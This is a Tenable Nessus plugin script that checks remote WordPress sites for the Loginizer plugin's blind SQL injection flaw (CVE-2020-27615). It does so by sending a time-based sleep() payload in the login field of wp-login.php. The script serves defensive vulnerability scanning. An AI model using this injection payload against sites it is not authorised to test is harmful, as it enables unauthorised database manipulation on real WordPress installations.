WordPress Loginizer plugin < 1.6.4 blind SQLi (CVE-2020-27615)

#
# (C) Tenable Network Security, Inc.
#

include('compat.inc');

if (description)
{
  script_id(141810);
  script_version("1.4");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/12/05");

  script_cve_id("CVE-2020-27615");
  script_xref(name:"CEA-ID", value:"CEA-2020-0130");

  script_name(english:"WordPress Loginizer plugin < 1.6.4 blind SQLi (CVE-2020-27615)");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server hosts a PHP script that is affected by a remote SQL injection vulnerability.");
  script_set_attribute(attribute:"description", value:
"The Loginizer Plugin for WordPress running on the remote web server is affected by a SQL injection vulnerability
due to improper sanitization of user-supplied input. An unauthenticated, remote attacker can exploit this issue to
inject or manipulate SQL queries in the back-end database, resulting in the manipulation of arbitrary data.");
  script_set_attribute(attribute:"see_also", value:"https://wpdeeply.com/loginizer-before-1-6-4-sqli-injection/");
  script_set_attribute(attribute:"see_also", value:"https://loginizer.com/blog/loginizer-1-6-4-security-fix/");
  script_set_attribute(attribute:"solution", value:
"Upgrade the Loginizer Plugin for WordPress to version 1.6.4 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2020-27615");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2020/10/21");
  script_set_attribute(attribute:"patch_publication_date", value:"2020/10/21");
  script_set_attribute(attribute:"plugin_publication_date", value:"2020/10/22");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:wordpress:wordpress");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("wordpress_detect.nasl");
  script_require_keys("installed_sw/WordPress", "www/PHP");
  script_require_ports("Services/www", 80);

  exit(0);
}

include('http.inc');
include('url_func.inc');
include('webapp_func.inc');

app = 'WordPress';

get_install_count(app_name:app, exit_if_zero:TRUE);

port = get_http_port(default:80, php:TRUE);

install = get_single_install(app_name:app, port:port);

dir = install['path'];
install_url = build_url(port:port, qs:dir);

plugin     = 'Loginizer';
plugin_dir = '/wp-content/plugins/loginizer/';
plugin_url = build_url(port:port, qs:dir + plugin_dir);

installed = get_kb_item('www/'+port+'/webapp_ext/'+plugin+' under '+dir);

if (!installed)
{
  checks = make_array();
  checks[plugin_dir + 'readme.txt'][0] = make_list('=== Loginizer ===');

  installed = check_webapp_ext(
    checks : checks,
    dir    : dir,
    port   : port,
    ext    : plugin
  );
}
if (!installed) audit(AUDIT_WEB_APP_EXT_NOT_INST, app, install_url, plugin + ' plugin');

# then we attempt to exploit it
stimes = make_list(15, 15);
num_queries = max_index(stimes);

vuln = FALSE;

url = '/wp-login.php';
postdata = 'log=nessus&pwd=1229132295&wp-submit=Log+In&redirect_to=&testcookie=1';
http_send_recv3(
  method  : 'POST',
  port    : port,
  item    : dir + url,
  data    : postdata,
  content_type : 'application/x-www-form-urlencoded',
  exit_on_fail : TRUE
);

for (i = 0; i < max_index(stimes); i++)
{
  http_set_read_timeout(stimes[i] + 10);
  then = unixtime();

  postdata = 'log=nessus%27%2C+lockout%3Dlockout%2Bsleep%28' + stimes[i] + '%29+WHERE+username%3D%27nessus%27+LIMIT+1%3B%23&pwd=1229132295&wp-submit=Log+In&testcookie=1';

  res = http_send_recv3(
    method  : 'POST',
    port    : port,
    item    : dir + url,
    data    : postdata,
    content_type : 'application/x-www-form-urlencoded',
    exit_on_fail : TRUE
  );

  now = unixtime();
  ttime = now - then;

  query = 'SLEEP(' +stimes[i]+ ');';

  time_per_query += 'Query #' + (i+1) + ' : ' + query + ' Sleep Time : ' +
  stimes[i] + ' secs  Response Time : ' + ttime + ' secs\n';

  overalltime += ttime;
  if ( (ttime >= stimes[i]) && (ttime <= (stimes[i] + 15)) )
  {
    vuln = TRUE;

    output =
      'Blind SQL Injection Results' +
      '\n  Query                          : ' + query +
      '\n  Response time                  : ' + ttime + ' secs' +
      '\n  Number of queries executed     : ' + num_queries +
      '\n  Total test time                : ' + overalltime + ' secs' +
      '\n  Time per query                 : ' +
      '\n'+ '  ' + time_per_query;

    continue;
  }
  else
    vuln = FALSE;
}

if (!vuln)
  audit(AUDIT_WEB_APP_EXT_NOT_AFFECTED, app, plugin_url, plugin + ' plugin');

security_report_v4(
  port       : port,
  severity   : SECURITY_HOLE,
  generic    : TRUE,
  sqli       : TRUE,
  request    : make_list(http_last_sent_request()),
  output     : output
);